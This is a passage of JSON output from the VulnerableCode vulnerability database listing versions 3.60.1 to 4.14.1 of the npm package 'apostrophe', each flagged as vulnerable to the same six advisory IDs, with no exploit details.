ackages/pkg:npm/apostrophe@3.60.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989014?format=json","purl":"pkg:npm/apostrophe@3.60.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.60.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989015?format=json","purl":"pkg:npm/apostrophe@3.61.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.61.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989016?format=json","purl":"pkg:npm/apostrophe@3.61.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.61.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989017?format=json","purl":"pkg:npm/apostrophe@3.62.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.62.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989018?format=json","purl":"pkg:npm/apostrophe@3.63.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.63.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989019?format=json","purl":"pkg:npm/apostrophe@3.63.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.63.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989020?format=json","purl":"pkg:npm/apostrophe@3.63.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.63.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989021?format=json","purl":"pkg:npm/apostrophe@3.63.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.63.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989022?format=json","purl":"pkg:npm/apostrophe@3.64.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.64.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989023?format=json","purl":"pkg:npm/apostrophe@3.65.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.65.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989024?format=json","purl":"pkg:npm/apostrophe@3.66.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.66.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989025?format=json","purl":"pkg:npm/apostrophe@3.67.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.67.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989026?format=json","purl":"pkg:npm/apostrophe@3.67.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.67.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989027?format=json","purl":"pkg:npm/apostrophe@3.67.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.67.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989028?format=json","purl":"pkg:npm/apostrophe@3.67.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.67.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989029?format=json","purl":"pkg:npm/apostrophe@4.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989030?format=json","purl":"pkg:npm/apostrophe@4.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989031?format=json","purl":"pkg:npm/apostrophe@4.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989032?format=json","purl":"pkg:npm/apostrophe@4.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989033?format=json","purl":"pkg:npm/apostrophe@4.2.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.2.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989034?format=json","purl":"pkg:npm/apostrophe@4.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989035?format=json","purl":"pkg:npm/apostrophe@4.2.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.2.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989036?format=json","purl":"pkg:npm/apostrophe@4.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989037?format=json","purl":"pkg:npm/apostrophe@4.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989038?format=json","purl":"pkg:npm/apostrophe@4.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.3.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989039?format=json","purl":"pkg:npm/apostrophe@4.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.3.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989040?format=json","purl":"pkg:npm/apostrophe@4.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989041?format=json","purl":"pkg:npm/apostrophe@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989042?format=json","purl":"pkg:npm/apostrophe@4.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.4.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989043?format=json","purl":"pkg:npm/apostrophe@4.4.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.4.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989044?format=json","purl":"pkg:npm/apostrophe@4.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989045?format=json","purl":"pkg:npm/apostrophe@4.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989046?format=json","purl":"pkg:npm/apostrophe@4.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.5.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989047?format=json","purl":"pkg:npm/apostrophe@4.5.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.5.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989048?format=json","purl":"pkg:npm/apostrophe@4.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/989049?format=json","purl":"pkg:npm/apostrophe@4.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.6.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989050?format=json","purl":"pkg:npm/apostrophe@4.6.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.6.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989051?format=json","purl":"pkg:npm/apostrophe@4.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989052?format=json","purl":"pkg:npm/apostrophe@4.7.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.7.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989053?format=json","purl":"pkg:npm/apostrophe@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.7.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989054?format=json","purl":"pkg:npm/apostrophe@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989055?format=json","purl":"pkg:npm/apostrophe@4.8.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.8.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989056?format=json","purl":"pkg:npm/apostrophe@4.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989057?format=json","purl":"pkg:npm/apostrophe@4.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989058?format=json","purl":"pkg:npm/apostrophe@4.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989059?format=json","purl":"pkg:npm/apostrophe@4.11.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.11.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989060?format=json","purl":"pkg:npm/apostrophe@4.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.11.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989061?format=json","purl":"pkg:npm/apostrophe@4.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.12.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989062?format=json","purl":"pkg:npm/apostrophe@4.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.13.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989063?format=json","purl":"pkg:npm/apostrophe@4.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.14.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989064?format=json","purl":"pkg:npm/apostrophe@4.14.1-beta.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.14.1-beta.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989065?format=json","purl":"pkg:npm/apostrophe@4.14.1","is_vulnerable":true,"affected_by_vulne